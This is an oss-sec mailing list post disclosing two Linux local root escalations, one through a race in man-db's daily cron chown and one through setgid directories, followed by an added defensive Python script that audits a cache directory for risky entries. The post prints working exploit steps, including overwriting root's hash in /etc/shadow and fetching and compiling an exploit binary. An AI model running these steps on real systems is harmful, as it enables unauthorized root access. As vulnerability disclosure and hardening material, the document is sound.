oss-sec mailing list archives
Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness
From: halfdog <me () halfdog net>
Date: Sat, 19 Dec 2015 11:23:49 +0000
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Solar Designer wrote:
> halfdog - http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/
> http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
>
> Thank you for documenting these peculiar findings. While your web pages
> are nicely formatted and have helpful cross-references, could you please
> post the actual content to oss-security directly? ...

Sorry, forgot that. I think you mentioned it already in some other post on
this list.

!!! Just for reference, please ignore !!!

The daily mandb cleanup job for old catman pages changes the permissions of
all non-man files to user man. This happens e.g. under Ubuntu Vivid with
/etc/cron.daily/man-db when systemd is not installed (/run/systemd/system
does not exist). The problematic code is

  # expunge old catman pages which have not been read in a week
  if [ ! -d /run/systemd/system ] && [ -d /var/cache/man ]; then
    cd /
    if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>&1; then
      echo "Running find" >&2
      find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
        xargs -r0 chown -f man || true
    fi
    start-stop-daemon --start --pidfile /dev/null --startas /bin/sh \
      --oknodo --chuid man $iosched_idle -- -c \
      "find /var/cache/man -type f -name '*.gz' -atime +6 -print0 | \
        xargs -r0 rm -f"
  fi

With https://www.halfdog.net/Misc/Utils/DirModifyInotify.c this can be used
to change ownership of /etc/shadow and escalate to root. To start, a
hardlink to a file of a different user has to be created.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/' /etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh
  (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

Read more at http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

On some Linux systems, directories with setgid bit set may be found, e.g.
using find / -type d -perm -02000. On Ubuntu Vivid this includes

  drwxr-sr-x 25 man root 4096 May 15 00:40 /var/cache/man

Creating a file as user man/man with setgid-bit flags will produce a file
with setgid bit really set but uid man/root. Normal writes will cause loss
of the setgid bit, but crafted writing allows filling the file and hence
escalating privileges to group root:

  man$ cd /var/cache/man
  man$ wget -q http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
  man$ gcc -o CreateSetgidBinary CreateSetgidBinary.c
  man$ ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg
  man$ ls -al ./escalate
  -rwsrwsr-t 1 man root 155 May 15 02:12 ./escalate
  man$ ./escalate /bin/sh
  man$ ls -al /proc/self/
  total 0
  dr-xr-xr-x 9 man root 0 May 15 02:13 .

Read more at http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/

-- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iEYEARECAAYFAlZ1PjoACgkQxFmThv7tq+6ouQCfZbKWiexcNN/iWNZb7Wc4Lhg1
vXQAn10Rx8RZVDVlSB4haUTQfsMlE3dv
=m9be
-----END PGP SIGNATURE-----
Attachment: CreateSetgidBinary.c
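Both findings in the post depend on things that should never exist inside a cache directory that a privileged cron job later chowns or deletes: entries owned by someone other than the cache user, hardlinks to files outside the tree, symlinks that can redirect a path component between find and chown, and setgid executables with group root in a setgid directory. The following audit script is an added example and is not code from halfdog's post or from man-db; it walks a tree with lstat (never following symlinks) and reports those conditions so an administrator can check a directory such as /var/cache/man before the daily job runs. The helper names and the constructed demo tree are assumptions made here.

```python
#!/usr/bin/env python3
"""Audit a shared cache directory for entries a privileged cleanup job should never meet.

Added example (not halfdog's code, not man-db's). Reason codes:
  symlink          - a symlink inside the cache; a directory component could be
                     redirected between find listing the path and chown/rm acting on it
  hardlink         - a regular file with link count > 1; a cache should not link to
                     files that live elsewhere (the post's ln /var/crash/.lock step)
  foreign-owner    - owner differs from the cache user, so a job like the one in the
                     post would chown it
  setgid-root-exec - an executable with the setgid bit and group root, the artifact
                     of creating files inside a setgid directory owned man:root
"""
import os
import stat
import tempfile
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Finding:
    path: str
    reasons: List[str]


def classify_entry(mode: int, uid: int, gid: int, nlink: int,
                   expected_uid: int, root_gid: int) -> List[str]:
    """Pure function of lstat() fields; returns reason codes, empty list if benign."""
    reasons: List[str] = []
    if stat.S_ISLNK(mode):
        reasons.append("symlink")
    if stat.S_ISREG(mode) and nlink > 1:
        reasons.append("hardlink")
    if uid != expected_uid:
        reasons.append("foreign-owner")
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    if stat.S_ISREG(mode) and mode & stat.S_ISGID and mode & exec_bits and gid == root_gid:
        reasons.append("setgid-root-exec")
    return reasons


def audit_tree(root: str, expected_uid: int, root_gid: int = 0) -> List[Finding]:
    """Walk root without following symlinks and lstat every entry (dirs and files)."""
    findings: List[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            reasons = classify_entry(st.st_mode, st.st_uid, st.st_gid, st.st_nlink,
                                     expected_uid, root_gid)
            if reasons:
                findings.append(Finding(path, reasons))
    return findings


def build_demo_tree() -> str:
    """Constructed sample layout (assumption, not a real system): one ordinary cache
    page, one hardlink into the cache from a file outside it, one symlinked entry."""
    base = tempfile.mkdtemp(prefix="cache-audit-demo-")
    cache = os.path.join(base, "cache")
    os.makedirs(os.path.join(cache, "cat1"))
    with open(os.path.join(cache, "cat1", "ls.1.gz"), "wb") as fh:
        fh.write(b"catman page")                       # benign cache content
    outside = os.path.join(base, "other.lock")         # stands in for a file elsewhere
    with open(outside, "wb") as fh:
        fh.write(b"lock")
    os.makedirs(os.path.join(cache, "etc"))
    os.link(outside, os.path.join(cache, "etc", "shadow"))   # link count becomes 2
    os.symlink("/nonexistent-target", os.path.join(cache, "etc2"))
    return cache


def demo() -> Dict[str, List[str]]:
    """Audit the constructed tree as the current user; map relative path -> reasons."""
    cache = build_demo_tree()
    found = audit_tree(cache, expected_uid=os.getuid(), root_gid=0)
    return {os.path.relpath(f.path, cache): f.reasons for f in found}


if __name__ == "__main__":
    # On a real host: audit_tree("/var/cache/man", pwd.getpwnam("man").pw_uid)
    for rel, why in sorted(demo().items()):
        print(f"{rel}: {', '.join(why)}")
```

Run as-is it audits only the constructed tree and reports etc/shadow as a hardlink and etc2 as a symlink. To check a real cache, call audit_tree with the directory and the uid of its owning user (for example pwd.getpwnam("man").pw_uid) and run it as root so every entry can be lstat'ed; the classification is deliberately a pure function of the lstat fields so it can be unit-tested without creating setgid files.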